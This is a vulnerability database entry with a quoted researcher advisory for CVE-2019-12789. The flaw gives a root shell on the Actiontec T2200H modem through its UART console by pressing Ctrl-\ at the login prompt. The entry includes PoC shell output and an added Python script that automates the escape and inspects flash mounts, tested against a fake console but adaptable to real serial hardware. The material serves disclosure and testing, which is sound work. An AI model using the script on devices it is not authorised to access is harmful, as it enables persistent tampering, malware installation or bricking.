Actiontec T2200H security vulnerability

Vulnerability ID: 1632411    Vulnerability type: permissions, privileges and access control
Published: 2019-06-13    Updated: 2019-06-21
CVE ID: CVE-2019-12789    CNNVD ID: CNNVD-201906-654
Platform: N/A    CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019060076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-654
|Vulnerability details
Actiontec Electronics T2200H is a modem sold by the US company Actiontec Electronics. Firmware version T2200H-31.128L.08 of the Actiontec Electronics T2200H contains a security vulnerability: an attacker with physical access to the UART pins on the system board can obtain a shell with root privileges and make permanent modifications to the device, including blocking automatic updates and installing malicious code on it.
|Vulnerability exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

###  Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: T2200H
Affected Firmware: T2200H-31.128L.08
Device Manual:
http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manual.pdf

Reported: Sept 2018
CVE: CVE-2019-12789

The Telus Actiontec T2200H is a bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,
802.11bgn wireless, etc.

###   Summary of Findings

By attaching an adapter, such as a Raspberry Pi or other UART adapter,
to the UART pins on the system board, an attacker can use a special
key sequence (Ctrl-\) to obtain a shell with root privileges at the
login prompt.

After gaining root access, the attacker can mount the linux /dev/md*
jffs2 partitions read-write and make permanent modifications to the
device including disabling features such as remote management, vendor
updating, etc. It can also be used to overwrite the flash storage,
permanently bricking the device.

Other note: I was also able to cross-compile a new full-functionality
BusyBox binary using https://buildroot.org/. By plugging in a USB Mass
Storage Device on the rear of the modem, I was able to dump the firmware
using “busybox dd”.

### PoC (UART output)
Login:
Password:  (Ctrl+\)
….
(Long stack trace)
….
#
# cat /etc/image_version
T2200H-311288BGW1521450


# ps aux
  PID USER       VSZ STAT COMMAND
   233 admin     1980 R    -/bin/sh
  251 admin        0 DW<  [kthread]
  269 admin        0 SW   [kpAliveWatchdog]
  301 admin        0 SW   [bcmsw]
  302 admin        0 SW   [bcmsw_timer]
  355 500       2344 S    /bin/dbus-daemon --system
  372 admin     1976 S    syslogd -n -C -l 5
  373 admin     1952 S    klogd -n
  911 admin     1732 S    /bin/wlevt
 1041 admin        0 SW   [dsl0]
 1273 admin     7084 S    swmdk
 1401 admin     1800 S    ./pmd
 1451 admin     5304 S    smbd -D
 1540 admin     7084 S    swmdk
 1541 admin     7084 S    swmdk
 1544 admin     7084 S    swmdk
 1569 admin     5304 S    smbd -D
 1661 admin     1304 S    /bin/lld2d br0
 1785 admin     1240 S    /bin/eapd
 1803 admin     1676 S    /bin/nas
 2129 admin     1344 S    /bin/acsd
 2175 admin     3132 R    /bin/wps_monitor
 2262 admin     3916 S    ./data_center
 5941 admin     2924 S    dhcp6s -c /var/dhcp6s.conf br0
 6018 admin      896 S    radvd -C /var/radvd.conf

# mount
rootfs on / type rootfs (rw)
mtd:rootfs on / type jffs2 (ro,relatime)
proc on /proc type proc (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime,size=420k)
tmpfs on /mnt type tmpfs (rw,relatime,size=16k)
sysfs on /sys type sysfs (rw,relatime)
mtd:data on /data type jffs2 (rw,relatime)




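The escape described in the PoC above, driven from the host side, as an added example that is not part of the advisory or of any Actiontec or Telus code. It models the UART session with a constructed fake console (the `FakeT2200HConsole` class, which replays the prompts, the `cat /etc/image_version` line and the `mount` output shown in the PoC); against real hardware the same functions work on a pyserial `Serial` object, whose port name and baud rate are not given in the advisory and are assumptions here. The script sends the tty quit character (Ctrl-\, byte 0x1c), checks whether a `#` prompt comes back, and then parses `mount` to report which jffs2 flash partitions are mounted read-only, which is the state that has to change (or that a defender would want to confirm is unchanged) before the persistent modifications the advisory describes. The `honours_escape=False` mode of the fake is an assumption about how a fixed device would behave, used only so the check has a negative case.

```python
"""Added example (not from the advisory): drive a serial console to test whether
the login prompt still drops to a root shell on Ctrl-\\, then inspect mounts."""
import re

CTRL_BACKSLASH = b"\x1c"   # tty 'quit' character: the key sequence from the PoC
SHELL_PROMPT = b"\n# "     # what the PoC shows after the stack trace

# Constructed replay of the PoC output; the values are taken from the advisory.
MOCK_STACK_TRACE = b"....\n(Long stack trace)\n...."
MOCK_MOUNT = (
    b"rootfs on / type rootfs (rw)\n"
    b"mtd:rootfs on / type jffs2 (ro,relatime)\n"
    b"proc on /proc type proc (rw,relatime)\n"
    b"tmpfs on /var type tmpfs (rw,relatime,size=420k)\n"
    b"mtd:data on /data type jffs2 (rw,relatime)\n"
)
MOCK_COMMANDS = {
    b"cat /etc/image_version": b"T2200H-311288BGW1521450\n",
    b"mount": MOCK_MOUNT,
}


class FakeT2200HConsole:
    """Constructed stand-in for pyserial's Serial (read/write only).
    honours_escape=False is an assumed 'fixed' device for the negative case."""

    def __init__(self, honours_escape=True):
        self.honours_escape = honours_escape
        self._rx = bytearray(b"Login: ")  # bytes the host has not read yet
        self._line = bytearray()          # host input since the last newline
        self._state = "login"

    def read(self, size=1):
        data = bytes(self._rx[:size])
        del self._rx[:size]
        return data                       # b"" plays the role of a read timeout

    def write(self, data):
        for byte in data:
            ch = bytes([byte])
            if ch == CTRL_BACKSLASH and self._state == "password":
                if self.honours_escape:   # vulnerable behaviour from the PoC
                    self._rx += b"\n" + MOCK_STACK_TRACE + SHELL_PROMPT
                    self._state = "shell"
                self._line.clear()
            elif ch != b"\n":
                self._line += ch
            else:
                line = bytes(self._line)
                self._line.clear()
                if self._state == "login":
                    self._rx += b"\nPassword: "
                    self._state = "password"
                elif self._state == "password":
                    self._rx += b"\nLogin incorrect\nLogin: "
                    self._state = "login"
                else:
                    reply = MOCK_COMMANDS.get(line, b"sh: " + line + b": not found\n")
                    self._rx += reply + b"# "
        return len(data)


def read_until(port, marker, limit=65536):
    """Read byte by byte until the buffer ends with marker, times out, or fills."""
    buf = bytearray()
    while not buf.endswith(marker) and len(buf) < limit:
        chunk = port.read(1)
        if not chunk:
            break
        buf += chunk
    return bytes(buf)


def get_root_shell(port, username=b"admin"):
    """Reproduce the PoC: answer 'Login:', then send Ctrl-\\ at 'Password:'.
    Returns True if a '# ' prompt appears, i.e. the device is vulnerable."""
    read_until(port, b"Login: ")
    port.write(username + b"\n")
    read_until(port, b"Password: ")
    port.write(CTRL_BACKSLASH)
    return read_until(port, SHELL_PROMPT).endswith(SHELL_PROMPT)


def run_command(port, command):
    """Run one shell command on the obtained shell and return its output text."""
    port.write(command.encode() + b"\n")
    out = read_until(port, SHELL_PROMPT)
    return out[: -len(SHELL_PROMPT)].decode(errors="replace")


MOUNT_RE = re.compile(r"^(\S+) on (\S+) type (\S+) \(([^)]*)\)$")


def parse_mount(text):
    """Parse BusyBox 'mount' output into a list of dicts, one per mount."""
    entries = []
    for line in text.splitlines():
        m = MOUNT_RE.match(line.strip())
        if m:
            dev, mountpoint, fstype, opts = m.groups()
            entries.append({"device": dev, "mountpoint": mountpoint,
                            "fstype": fstype, "options": opts.split(",")})
    return entries


def jffs2_partitions(entries):
    """(mountpoint, 'ro'|'rw') for every jffs2 flash partition: the ones that
    must be remounted rw before the persistent changes the advisory describes."""
    return [(e["mountpoint"], "rw" if "rw" in e["options"] else "ro")
            for e in entries if e["fstype"] == "jffs2"]


if __name__ == "__main__":
    # For real hardware swap the fake for pyserial, e.g.
    # serial.Serial("/dev/ttyUSB0", 115200, timeout=2); port and baud are assumptions.
    console = FakeT2200HConsole()
    if get_root_shell(console):
        print("root shell; image:", run_command(console, "cat /etc/image_version"))
        print("jffs2:", jffs2_partitions(parse_mount(run_command(console, "mount"))))
```

`read_until` treats an empty read as the serial timeout, so on a device where the escape is ignored `get_root_shell` returns False after one timeout instead of hanging; on real hardware set `timeout=` on the `Serial` object so `read()` actually returns `b""`.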


|References

Source: www.actiontec.com

Link: https://www.actiontec.com/blog/


Source: seclists.org

Link: http://seclists.org/fulldisclosure/2019/Jun/10


Source: nvd.nist.gov

Link: https://nvd.nist.gov/vuln/detail/CVE-2019-12789